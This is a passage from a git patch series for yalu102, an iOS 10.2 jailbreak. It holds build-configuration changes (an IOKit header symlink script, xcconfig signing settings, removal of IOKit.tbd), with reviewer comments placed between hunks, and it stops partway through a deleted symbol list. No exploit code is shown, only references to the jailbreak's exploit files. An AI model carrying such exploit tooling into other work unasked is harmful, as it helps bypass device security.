From edf0859b33010194d0d5a0cd98d98d491285c0e4 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sat, 28 Jan 2017 14:51:36 +0100 Subject: [PATCH 01/34] Find IOKit headers automatically --- yalu102.xcodeproj/project.pbxproj | 27 +++++++++++++++++++++++++++ yalu102/include/.gitignore | 2 ++ yalu102/include/README.md | 3 +++ 3 files changed, 32 insertions(+) create mode 100644 yalu102/include/.gitignore create mode 100644 yalu102/include/README.md diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index 70c54fe..2609da2 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -150,6 +150,7 @@ isa = PBXNativeTarget; buildConfigurationList = EA9900FA1E1E9F060056FEBD /* Build configuration list for PBXNativeTarget "yalu102" */; buildPhases = ( + A72976DF1E3CD3E10011A922 /* Create IOKit symlink */, EA9900DF1E1E9F060056FEBD /* Sources */, EA9900E01E1E9F060056FEBD /* Frameworks */, EA9900E11E1E9F060056FEBD /* Resources */, @@ -231,6 +232,24 @@ }; /* End PBXResourcesBuildPhase section */ +/* Begin PBXShellScriptBuildPhase section */ + A72976DF1E3CD3E10011A922 /* Create IOKit symlink */ = { + isa = PBXShellScriptBuildPhase; + buildActionMask = 2147483647; + files = ( + ); + inputPaths = ( + ); + name = "Create IOKit symlink"; + outputPaths = ( + ); + runOnlyForDeploymentPostprocessing = 0; + shellPath = /bin/sh; + shellScript = "DESTPATH=\"$PROJECT_DIR/yalu102/include\"\nMACOSSDK=$PLATFORM_DIR/../MacOSX.platform/Developer/SDKs/MacOSX.sdk\nset -e\n[ ! -e \"$DESTPATH/IOKit\" ] && ln -s \"$MACOSSDK/System/Library/Frameworks/IOKit.framework/Headers\" \"$DESTPATH/IOKit\"\n[ ! -e \"$DESTPATH/libkern\" ] && ln -s \"$MACOSSDK/usr/include/libkern\" \"$DESTPATH/libkern\"\n"; + showEnvVarsInLog = 0; + }; +/* End PBXShellScriptBuildPhase section */ + /* Begin PBXSourcesBuildPhase section */ EA9900DF1E1E9F060056FEBD /* Sources */ = { isa = PBXSourcesBuildPhase; 
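Review bot: The existence test in the new shellScript, `[ ! -e "$DESTPATH/IOKit" ]`, is true for a dangling symlink (`-e` follows the link), so once `ln -s` has been run against a `$MACOSSDK` that does not exist on this machine the link is created pointing nowhere and every later build dies on `ln: File exists` under `set -e` until someone removes it by hand. Check the target before linking and treat a leftover link as existing, e.g. `[ -d "$MACOSSDK/System/Library/Frameworks/IOKit.framework/Headers" ] || { echo "IOKit headers not found under $MACOSSDK" >&2; exit 1; }` followed by `if [ ! -e "$DESTPATH/IOKit" ] && [ ! -L "$DESTPATH/IOKit" ]; then ...`. The rewritten script in the `@@ -245,8 +245,7 @@` hunk of the fourth patch has the same gap.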
@@ -370,6 +389,10 @@ ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; CLANG_ENABLE_OBJC_ARC = NO; DEVELOPMENT_TEAM = CGTX3WH3ZS; + HEADER_SEARCH_PATHS = ( + "$(inherited)", + "$(PROJECT_DIR)/yalu102/include", + ); INFOPLIST_FILE = yalu102/Info.plist; LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; LIBRARY_SEARCH_PATHS = ( @@ -389,6 +412,10 @@ ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; CLANG_ENABLE_OBJC_ARC = NO; DEVELOPMENT_TEAM = CGTX3WH3ZS; + HEADER_SEARCH_PATHS = ( + "$(inherited)", + "$(PROJECT_DIR)/yalu102/include", + ); INFOPLIST_FILE = yalu102/Info.plist; LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; LIBRARY_SEARCH_PATHS = ( diff --git a/yalu102/include/.gitignore b/yalu102/include/.gitignore new file mode 100644 index 0000000..fc59920 --- /dev/null +++ b/yalu102/include/.gitignore @@ -0,0 +1,2 @@ +IOKit +libkern diff --git a/yalu102/include/README.md b/yalu102/include/README.md new file mode 100644 index 0000000..24ec1a4 --- /dev/null +++ b/yalu102/include/README.md @@ -0,0 +1,3 @@ +IOKit's `Headers` directory from macOS 10.12 is expected to be found here, named `IOKit`. Dependencies of IOKit (namely libkern) should also be made available through this directory. + +The Xcode project will automatically all required symlinks when compiling, but you're free to place your own directories here. They will be left alone. From fff1a902350194a24c8aef913f6de64f68a95796 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sat, 28 Jan 2017 14:54:42 +0100 Subject: [PATCH 02/34] Update README.md --- README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index 53a68ba..73bd1db 100644 --- a/README.md +++ b/README.md 
@@ -38,8 +38,7 @@ If you are already on iOS 10.2 with an iPhone 7, **stay there**. The actual expl 1. `git clone` the repo. 2. Open the repo in Xcode 3. Change the bundle ID, as shown [here](https://www.reddit.com/r/sideloaded/wiki/how-to-sideload#wiki_changing_the_bundle_identifier_and_team) -4. Include the IOKit headers, and add them to your search path. -5. Run the project. +4. Run the project. ## Installing From f34ec9f945c0be5ba5873b937bc2e50c6972ea8e Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sat, 28 Jan 2017 15:09:42 +0100 Subject: [PATCH 03/34] Update README.md --- yalu102/include/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yalu102/include/README.md b/yalu102/include/README.md index 24ec1a4..8eaf44f 100644 --- a/yalu102/include/README.md +++ b/yalu102/include/README.md @@ -1,3 +1,3 @@ -IOKit's `Headers` directory from macOS 10.12 is expected to be found here, named `IOKit`. Dependencies of IOKit (namely libkern) should also be made available through this directory. +IOKit's `Headers` directory from the macOS SDK is expected to be found here, named `IOKit`. Dependencies of IOKit (namely libkern) should also be made available through this directory. -The Xcode project will automatically all required symlinks when compiling, but you're free to place your own directories here. They will be left alone. +The Xcode project will automatically create all required symlinks when compiling, but you're free to place your own directories here. They will be left alone. From c9d2626c7ea4f65014427de86ad15547107f9184 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sat, 28 Jan 2017 16:20:01 +0100 Subject: [PATCH 04/34] Fix IOKit symlink script return code --- yalu102.xcodeproj/project.pbxproj | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index 2609da2..815b12f 100644 --- a/yalu102.xcodeproj/project.pbxproj 
+++ b/yalu102.xcodeproj/project.pbxproj @@ -245,8 +245,7 @@ ); runOnlyForDeploymentPostprocessing = 0; shellPath = /bin/sh; - shellScript = "DESTPATH=\"$PROJECT_DIR/yalu102/include\"\nMACOSSDK=$PLATFORM_DIR/../MacOSX.platform/Developer/SDKs/MacOSX.sdk\nset -e\n[ ! -e \"$DESTPATH/IOKit\" ] && ln -s \"$MACOSSDK/System/Library/Frameworks/IOKit.framework/Headers\" \"$DESTPATH/IOKit\"\n[ ! -e \"$DESTPATH/libkern\" ] && ln -s \"$MACOSSDK/usr/include/libkern\" \"$DESTPATH/libkern\"\n"; - showEnvVarsInLog = 0; + shellScript = "set -x\nset -e\nDESTPATH=\"$PROJECT_DIR/yalu102/include\"\nMACOSSDK=\"$PLATFORM_DIR/../MacOSX.platform/Developer/SDKs/MacOSX.sdk\"\nif [ ! -e \"$DESTPATH/IOKit\" ]; then\n ln -s \"$MACOSSDK/System/Library/Frameworks/IOKit.framework/Headers\" \"$DESTPATH/IOKit\"\nfi\nif [ ! -e \"$DESTPATH/libkern\" ]; then\n ln -s \"$MACOSSDK/usr/include/libkern\" \"$DESTPATH/libkern\"\nfi\n"; }; /* End PBXShellScriptBuildPhase section */ From cce9b5a7cf764b757eccb6448df764b1416d94dc Mon Sep 17 00:00:00 2001 
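Review bot: The hunk drops `showEnvVarsInLog = 0;` and adds `set -x`, neither of which is needed for the return-code fix the commit is about; if I read Xcode's default for a missing key correctly, the full build environment of this phase (including the team ID and any signing-related variables) now goes into every build log, and `set -x` echoes each expanded path on top of that. Keep the fix to the `if`/`fi` rewrite, restore `showEnvVarsInLog = 0;`, and drop `set -x` unless the log output is actually wanted.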
From: Oliver Kuckertz Date: Sat, 28 Jan 2017 17:52:00 +0100 Subject: [PATCH 05/34] Reorganize Xcode project Remove IOKit.tbd and use the one shipped in the iOS SDK instead; move bootstrap files to Resources directory; move code signing settings to separate Xcode config file for the sake of keeping git diffs clean. --- yalu102.xcconfig | 4 + yalu102.xcodeproj/project.pbxproj | 96 ++- yalu102/IOKit.tbd | 852 ------------------------- yalu102/{ => Resources}/0.reload.plist | 0 yalu102/{ => Resources}/bootstrap.tar | Bin yalu102/{ => Resources}/launchctl | Bin yalu102/{ => Resources}/reload | 0 yalu102/{ => Resources}/tar | Bin 8 files changed, 40 insertions(+), 912 deletions(-) create mode 100644 yalu102.xcconfig delete mode 100644 yalu102/IOKit.tbd rename yalu102/{ => Resources}/0.reload.plist (100%) rename yalu102/{ => Resources}/bootstrap.tar (100%) rename yalu102/{ => Resources}/launchctl (100%) rename yalu102/{ => Resources}/reload (100%) rename yalu102/{ => Resources}/tar (100%) mode change 100644 => 100755 diff --git a/yalu102.xcconfig b/yalu102.xcconfig new file mode 100644 index 0000000..e5a83d4 --- /dev/null +++ b/yalu102.xcconfig @@ -0,0 +1,4 @@ +// Enter your custom team ID and bundle ID here. +// Do not commit the results into the git repository. +DEVELOPMENT_TEAM = CGTX3WH3ZS; +PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index 815b12f..556e418 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj 
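Review bot: The new yalu102.xcconfig tells the reader "Do not commit the results into the git repository" while the file itself is tracked with the author's real `DEVELOPMENT_TEAM` and bundle ID, so every contributor's required local edit shows up as a modified tracked file and a careless `git add -A` commits their own team ID, which is the opposite of the stated goal of keeping diffs clean. A tracked template with placeholder values (say `yalu102.xcconfig.example`, with `yalu102.xcconfig` listed in `.gitignore`) avoids that, at the cost of a documented copy step before the first build, since the project now references `yalu102.xcconfig` via `baseConfigurationReference` and a fresh clone would otherwise be missing it. Alternatively document `git update-index --skip-worktree yalu102.xcconfig` for contributors who keep the tracked file.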
@@ -7,6 +7,7 @@ objects = { /* Begin PBXBuildFile section */ + A72023721E3CFC2B00FADBFF /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = A72023711E3CFBCA00FADBFF /* IOKit.framework */; }; EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */; }; EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BA61E398E33009CA025 /* 0.reload.plist */; }; EA1A3BAD1E399006009CA025 /* reload in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BAC1E399006009CA025 /* reload */; }; 
@@ -21,25 +22,14 @@ EA99010A1E21A04C0056FEBD /* tar in Resources */ = {isa = PBXBuildFile; fileRef = EA9901091E21A04C0056FEBD /* tar */; }; EA99010C1E21A0520056FEBD /* launchctl in Resources */ = {isa = PBXBuildFile; fileRef = EA99010B1E21A0520056FEBD /* launchctl */; }; EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = EA99010D1E21A1560056FEBD /* jailbreak.m */; }; - EA9901141E21A1B00056FEBD /* iokitmig64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA9901131E21A1B00056FEBD /* iokitmig64.o */; }; EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9901161E21A1D90056FEBD /* devicesupport.m */; }; - EA9901191E21A2180056FEBD /* IOKit.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = EA9901181E21A2180056FEBD /* IOKit.tbd */; }; /* End PBXBuildFile section */ -/* Begin PBXContainerItemProxy section */ - EA1A3BA41E398E28009CA025 /* PBXContainerItemProxy */ = { - isa = PBXContainerItemProxy; - containerPortal = EA1A3BA01E398E28009CA025 /* mach_portal.xcodeproj */; - proxyType = 2; - remoteGlobalIDString = B0FB96FC1DEB2C8600C0D3C4; - remoteInfo = mach_portal; - }; -/* End PBXContainerItemProxy section */ - /* Begin PBXFileReference section */ + A72023711E3CFBCA00FADBFF /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = System/Library/Frameworks/IOKit.framework; sourceTree = SDKROOT; }; + A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */ = {isa = PBXFileReference; lastKnownFileType = text.xcconfig; path = yalu102.xcconfig; sourceTree = ""; }; EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; }; EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = patchfinder64.o; sourceTree = ""; }; - EA1A3BA01E398E28009CA025 /* mach_portal.xcodeproj */ = {isa = 
PBXFileReference; lastKnownFileType = "wrapper.pb-project"; name = mach_portal.xcodeproj; path = "../../Downloads/mach_portal_redist-1/mach_portal/mach_portal.xcodeproj"; sourceTree = ""; }; EA1A3BA61E398E33009CA025 /* 0.reload.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = 0.reload.plist; sourceTree = ""; }; EA1A3BAC1E399006009CA025 /* reload */ = {isa = PBXFileReference; lastKnownFileType = text.script.sh; path = reload; sourceTree = ""; }; EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; @@ -59,10 +49,8 @@ EA99010B1E21A0520056FEBD /* launchctl */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = launchctl; sourceTree = ""; }; EA99010D1E21A1560056FEBD /* jailbreak.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = jailbreak.m; sourceTree = ""; }; EA99010F1E21A1A00056FEBD /* pte_stuff.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = pte_stuff.h; sourceTree = ""; }; - EA9901131E21A1B00056FEBD /* iokitmig64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = iokitmig64.o; sourceTree = ""; }; EA9901151E21A1D90056FEBD /* devicesupport.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = devicesupport.h; sourceTree = ""; }; EA9901161E21A1D90056FEBD /* devicesupport.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = devicesupport.m; sourceTree = ""; }; - EA9901181E21A2180056FEBD /* IOKit.tbd */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = "sourcecode.text-based-dylib-definition"; path = IOKit.tbd; sourceTree = ""; }; /* End PBXFileReference section */ /* Begin PBXFrameworksBuildPhase section */ 
@@ -70,27 +58,40 @@ isa = PBXFrameworksBuildPhase; buildActionMask = 2147483647; files = ( - EA9901141E21A1B00056FEBD /* iokitmig64.o in Frameworks */, EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */, - EA9901191E21A2180056FEBD /* IOKit.tbd in Frameworks */, + A72023721E3CFC2B00FADBFF /* IOKit.framework in Frameworks */, ); runOnlyForDeploymentPostprocessing = 0; }; /* End PBXFrameworksBuildPhase section */ /* Begin PBXGroup section */ - EA1A3BA11E398E28009CA025 /* Products */ = { + A720236F1E3CFB3500FADBFF /* Resources */ = { isa = PBXGroup; children = ( - EA1A3BA51E398E28009CA025 /* mach_portal.app */, + EA1A3BA61E398E33009CA025 /* 0.reload.plist */, + EA9901051E219FF10056FEBD /* bootstrap.tar */, + EA99010B1E21A0520056FEBD /* launchctl */, + EA1A3BAC1E399006009CA025 /* reload */, + EA9901091E21A04C0056FEBD /* tar */, ); - name = Products; + path = Resources; + sourceTree = ""; + }; + A72023701E3CFBB900FADBFF /* Frameworks */ = { + isa = PBXGroup; + children = ( + A72023711E3CFBCA00FADBFF /* IOKit.framework */, + ); + name = Frameworks; sourceTree = ""; }; EA9900DA1E1E9F060056FEBD = { isa = PBXGroup; children = ( + A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */, EA9900E51E1E9F060056FEBD /* yalu102 */, + A72023701E3CFBB900FADBFF /* Frameworks */, EA9900E41E1E9F060056FEBD /* Products */, ); sourceTree = ""; 
@@ -106,31 +107,24 @@ EA9900E51E1E9F060056FEBD /* yalu102 */ = { isa = PBXGroup; children = ( - EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */, - EA9901021E219C210056FEBD /* offsets.c */, - EA9901031E219C210056FEBD /* offsets.h */, - EA1A3BA01E398E28009CA025 /* mach_portal.xcodeproj */, - EA99010D1E21A1560056FEBD /* jailbreak.m */, + EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */, + A720236F1E3CFB3500FADBFF /* Resources */, + EA9900E61E1E9F060056FEBD /* Supporting Files */, + EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */, + EA9900EF1E1E9F060056FEBD /* Main.storyboard */, EA9900E91E1E9F060056FEBD /* AppDelegate.h */, - EA1A3BA61E398E33009CA025 /* 0.reload.plist */, - EA1A3BAC1E399006009CA025 /* reload */, EA9900EA1E1E9F060056FEBD /* AppDelegate.m */, - EA9900EC1E1E9F060056FEBD /* ViewController.h */, - EA9900ED1E1E9F060056FEBD /* ViewController.m */, - EA9900EF1E1E9F060056FEBD /* Main.storyboard */, - EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */, + EA9901151E21A1D90056FEBD /* devicesupport.h */, + EA9901161E21A1D90056FEBD /* devicesupport.m */, EA9900F71E1E9F060056FEBD /* Info.plist */, - EA9901051E219FF10056FEBD /* bootstrap.tar */, - EA9901091E21A04C0056FEBD /* tar */, - EA99010B1E21A0520056FEBD /* launchctl */, - EA9901131E21A1B00056FEBD /* iokitmig64.o */, + EA99010D1E21A1560056FEBD /* jailbreak.m */, + EA9901021E219C210056FEBD /* offsets.c */, + EA9901031E219C210056FEBD /* offsets.h */, + EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */, EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */, EA99010F1E21A1A00056FEBD /* pte_stuff.h */, - EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */, - EA9901181E21A2180056FEBD /* IOKit.tbd */, - EA9901151E21A1D90056FEBD /* devicesupport.h */, - EA9901161E21A1D90056FEBD /* devicesupport.m */, - EA9900E61E1E9F060056FEBD /* Supporting Files */, + EA9900EC1E1E9F060056FEBD /* ViewController.h */, + EA9900ED1E1E9F060056FEBD /* ViewController.m */, ); path = yalu102; sourceTree = ""; 
@@ -191,12 +185,6 @@ mainGroup = EA9900DA1E1E9F060056FEBD; productRefGroup = EA9900E41E1E9F060056FEBD /* Products */; projectDirPath = ""; - projectReferences = ( - { - ProductGroup = EA1A3BA11E398E28009CA025 /* Products */; - ProjectRef = EA1A3BA01E398E28009CA025 /* mach_portal.xcodeproj */; - }, - ); projectRoot = ""; targets = ( EA9900E21E1E9F060056FEBD /* yalu102 */, @@ -204,16 +192,6 @@ }; /* End PBXProject section */ -/* Begin PBXReferenceProxy section */ - EA1A3BA51E398E28009CA025 /* mach_portal.app */ = { - isa = PBXReferenceProxy; - fileType = wrapper.application; - path = mach_portal.app; - remoteRef = EA1A3BA41E398E28009CA025 /* PBXContainerItemProxy */; - sourceTree = BUILT_PRODUCTS_DIR; - }; -/* End PBXReferenceProxy section */ - /* Begin PBXResourcesBuildPhase section */ EA9900E11E1E9F060056FEBD /* Resources */ = { isa = PBXResourcesBuildPhase; @@ -287,6 +265,7 @@ /* Begin XCBuildConfiguration section */ EA9900F81E1E9F060056FEBD /* Debug */ = { isa = XCBuildConfiguration; + baseConfigurationReference = A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */; buildSettings = { ALWAYS_SEARCH_USER_PATHS = NO; ARCHS = armv7; @@ -338,6 +317,7 @@ }; EA9900F91E1E9F060056FEBD /* Release */ = { isa = XCBuildConfiguration; + baseConfigurationReference = A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */; buildSettings = { ALWAYS_SEARCH_USER_PATHS = NO; ARCHS = armv7; @@ -387,7 +367,6 @@ ARCHS = armv7; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; CLANG_ENABLE_OBJC_ARC = NO; - DEVELOPMENT_TEAM = CGTX3WH3ZS; HEADER_SEARCH_PATHS = ( "$(inherited)", "$(PROJECT_DIR)/yalu102/include", @@ -398,7 +377,6 @@ "$(inherited)", "$(PROJECT_DIR)/yalu102", ); - PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; PRODUCT_NAME = "$(TARGET_NAME)"; VALID_ARCHS = armv7; }; @@ -410,7 +388,6 @@ ARCHS = armv7; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; CLANG_ENABLE_OBJC_ARC = NO; - DEVELOPMENT_TEAM = CGTX3WH3ZS; HEADER_SEARCH_PATHS = ( "$(inherited)", "$(PROJECT_DIR)/yalu102/include", 
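Review bot: The `baseConfigurationReference` lines in the `@@ -287,6 +265,7 @@` and `@@ -338,6 +317,7 @@` hunks attach the xcconfig to what appear to be the project-level configurations only, while the `DEVELOPMENT_TEAM` and `PRODUCT_BUNDLE_IDENTIFIER` keys are removed from the target-level ones in the `@@ -387`, `@@ -398`, `@@ -410` and following hunks; inheritance covers that, but in my experience Xcode's Signing pane writes `DEVELOPMENT_TEAM` back into the target's buildSettings, which overrides the xcconfig and re-dirties project.pbxproj. Worth a sentence in the top-level README telling contributors to set the team and bundle ID in `yalu102.xcconfig` rather than through the Signing pane, and to revert any `DEVELOPMENT_TEAM` line Xcode adds to project.pbxproj before committing.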
@@ -421,7 +398,6 @@ "$(inherited)", "$(PROJECT_DIR)/yalu102", ); - PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; PRODUCT_NAME = "$(TARGET_NAME)"; VALID_ARCHS = armv7; }; diff --git a/yalu102/IOKit.tbd b/yalu102/IOKit.tbd deleted file mode 100644 index f6b0829..0000000 --- a/yalu102/IOKit.tbd +++ /dev/null 
@@ -1,852 +0,0 @@ ---- -archs: [ armv7, armv7s, arm64, armv7k ] -platform: ios -install-name: /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit -current-version: 275.0 -exports: - - archs: [ armv7, armv7s, armv7k ] - symbols: [ _IOConnectMethodScalarIScalarO, _IOConnectMethodScalarIStructureI, - _IOConnectMethodScalarIStructureO, _IOConnectMethodStructureIStructureO, - _IOMapMemory, _io_async_method_scalarI_scalarO, - _io_async_method_scalarI_structureI, _io_async_method_scalarI_structureO, - _io_async_method_structureI_structureO, _io_catalog_get_data, - _io_catalog_get_gen_count, _io_catalog_module_loaded, - _io_catalog_reset, _io_catalog_send_data, _io_catalog_terminate, - _io_connect_add_client, _io_connect_async_method, - _io_connect_get_notification_semaphore, _io_connect_get_service, - _io_connect_map_memory, _io_connect_map_memory_into_task, - _io_connect_method, _io_connect_method_scalarI_scalarO, - _io_connect_method_scalarI_structureI, _io_connect_method_scalarI_structureO, - _io_connect_method_structureI_structureO, _io_connect_method_var_output, - _io_connect_set_notification_port, _io_connect_set_properties, - _io_connect_unmap_memory, _io_connect_unmap_memory_from_task, - _io_iterator_is_valid, _io_iterator_next, _io_iterator_reset, - _io_object_conforms_to, _io_object_get_bundle_identifier, - _io_object_get_class, _io_object_get_retain_count, - _io_object_get_superclass, _io_registry_create_iterator, - _io_registry_entry_create_iterator, _io_registry_entry_from_path, - _io_registry_entry_from_path_ool, _io_registry_entry_get_child_iterator, - _io_registry_entry_get_location_in_plane, _io_registry_entry_get_name, - _io_registry_entry_get_name_in_plane, _io_registry_entry_get_parent_iterator, - _io_registry_entry_get_path, _io_registry_entry_get_path_ool, - _io_registry_entry_get_properties, _io_registry_entry_get_properties_bin, - _io_registry_entry_get_property, _io_registry_entry_get_property_bin, - _io_registry_entry_get_property_bytes, 
_io_registry_entry_get_property_recursively, - _io_registry_entry_get_registry_entry_id, _io_registry_entry_in_plane, - _io_registry_entry_set_properties, _io_registry_get_root_entry, - _io_registry_iterator_enter_entry, _io_registry_iterator_exit_entry, - _io_server_version, _io_service_acknowledge_notification, - _io_service_add_interest_notification, _io_service_add_notification, - _io_service_add_notification_bin, _io_service_add_notification_ool, - _io_service_close, _io_service_get_authorization_id, - _io_service_get_busy_state, _io_service_get_matching_service, - _io_service_get_matching_service_bin, _io_service_get_matching_service_ool, - _io_service_get_matching_services, _io_service_get_matching_services_bin, - _io_service_get_matching_services_ool, _io_service_get_state, - _io_service_match_property_table, _io_service_match_property_table_bin, - _io_service_match_property_table_ool, _io_service_open_extended, - _io_service_request_probe, _io_service_set_authorization_id, - _io_service_wait_quiet ] - - archs: [ armv7, armv7s, arm64, armv7k ] - symbols: [ _IOAVAudioFormatTypeString, _IOAVAudioGetChannelAllocation, - _IOAVAudioGetChannelAllocationDefault, _IOAVAudioGetChannelLayoutData, - _IOAVAudioGetSpeakerAllocationMask, _IOAVAudioInterfaceCopyChannelLayoutElements, - _IOAVAudioInterfaceCopyDiagnosticsString, _IOAVAudioInterfaceCopyElements, - _IOAVAudioInterfaceCopyProperties, _IOAVAudioInterfaceCopyProperty, - _IOAVAudioInterfaceCreate, _IOAVAudioInterfaceCreateWithService, - _IOAVAudioInterfaceGetLinkData, _IOAVAudioInterfaceGetLinkDataWithSource, - _IOAVAudioInterfaceGetService, _IOAVAudioInterfaceGetTypeID, - _IOAVAudioInterfaceSetLogLevel, _IOAVAudioInterfaceSetLogLevelMask, - _IOAVAudioInterfaceSetProperty, _IOAVAudioInterfaceStartLink, - _IOAVAudioInterfaceStartLinkWithSource, _IOAVAudioInterfaceStopLink, - _IOAVAudioInterfaceStopLinkWithSource, _IOAVAudioSampleRate, - _IOAVAudioSampleRateScalar, _IOAVAudioSampleSize, - _IOAVAudioSpeakerString, 
_IOAVCommandString, _IOAVControlInterfaceCopyDiagnosticsString, - _IOAVControlInterfaceCopyProperties, _IOAVControlInterfaceCopyProperty, - _IOAVControlInterfaceCreate, _IOAVControlInterfaceCreateWithService, - _IOAVControlInterfaceGetService, _IOAVControlInterfaceGetTypeID, - _IOAVControlInterfaceSetLogLevel, _IOAVControlInterfaceSetLogLevelMask, - _IOAVControlInterfaceSetProperty, _IOAVControllerClearEventLog, - _IOAVControllerCopyDiagnosticsString, _IOAVControllerCopyProperties, - _IOAVControllerCopyProperty, _IOAVControllerCreate, - _IOAVControllerCreateWithLocation, _IOAVControllerCreateWithService, - _IOAVControllerForceHotPlugDetect, _IOAVControllerGetLocation, - _IOAVControllerGetPower, _IOAVControllerGetTypeID, - _IOAVControllerSetEventLogCommandMask, _IOAVControllerSetEventLogEventMask, - _IOAVControllerSetEventLogSize, _IOAVControllerSetLogLevel, - _IOAVControllerSetLogLevelMask, _IOAVControllerSetPower, - _IOAVControllerSetProperty, _IOAVControllerSetProtectionType, - _IOAVControllerSetQualityPattern, _IOAVCreateDiagnosticsReference, - _IOAVCreateDiagnosticsReferenceWithLocation, _IOAVCreateDiagnosticsString, - _IOAVCreateDiagnosticsStringWithLocation, _IOAVCreateStringWithAudioChannelLayoutData, - _IOAVCreateStringWithAudioLinkData, _IOAVCreateStringWithData, - _IOAVCreateStringWithElement, _IOAVCreateStringWithElements, - _IOAVCreateStringWithVideoColorData, _IOAVCreateStringWithVideoLinkData, - _IOAVCreateStringWithVideoTimingData, _IOAVDeviceClearEventLog, - _IOAVDeviceCopyDiagnosticsString, _IOAVDeviceCopyProperties, - _IOAVDeviceCopyProperty, _IOAVDeviceCreate, _IOAVDeviceCreateWithLocation, - _IOAVDeviceCreateWithService, _IOAVDeviceGetController, - _IOAVDeviceGetLinkData, _IOAVDeviceGetLocation, - _IOAVDeviceGetPower, _IOAVDeviceGetProtectionStatus, - _IOAVDeviceGetProtectionType, _IOAVDeviceGetTypeID, - _IOAVDeviceReadI2C, _IOAVDeviceSetEventLogCommandMask, - _IOAVDeviceSetEventLogEventMask, _IOAVDeviceSetEventLogSize, - _IOAVDeviceSetLogLevel, 
_IOAVDeviceSetLogLevelMask, - _IOAVDeviceSetPower, _IOAVDeviceSetProperty, _IOAVDeviceStartLink, - _IOAVDeviceStopLink, _IOAVDeviceWriteI2C, _IOAVEDIDIsStandard, - _IOAVElementTypeString, _IOAVEventLogEventTypeString, - _IOAVGetCEAVideoShortID, _IOAVGetCEAVideoShortIDWithData, - _IOAVGetCEAVideoShortIDWithDataActive, _IOAVGetCEAVideoTimingData, - _IOAVGetCEAVideoTimingDataWithShortID, _IOAVGetCVTVideoTimingData, - _IOAVGetDMTVideoTimingData, _IOAVGetGTFVideoTimingData, - _IOAVGetSPDInfoFrame, _IOAVGetSupportedVideoTimingDataList, - _IOAVGetTransportSupportsCEA, _IOAVGetTransportSupportsYCbCr, - _IOAVGetVideoTimingData, _IOAVGetVideoTimingITSource, - _IOAVHDMIAudioClockRegenerationDataForLink, _IOAVInfoFrameGetChecksum, - _IOAVInfoFrameTypeString, _IOAVLinkSourceString, - _IOAVLinkTypeString, _IOAVLocationString, _IOAVProtectionStatusString, - _IOAVProtectionTypeString, _IOAVRecoverableError, - _IOAVServiceClearEventLog, _IOAVServiceCopyDiagnosticsString, - _IOAVServiceCopyEDID, 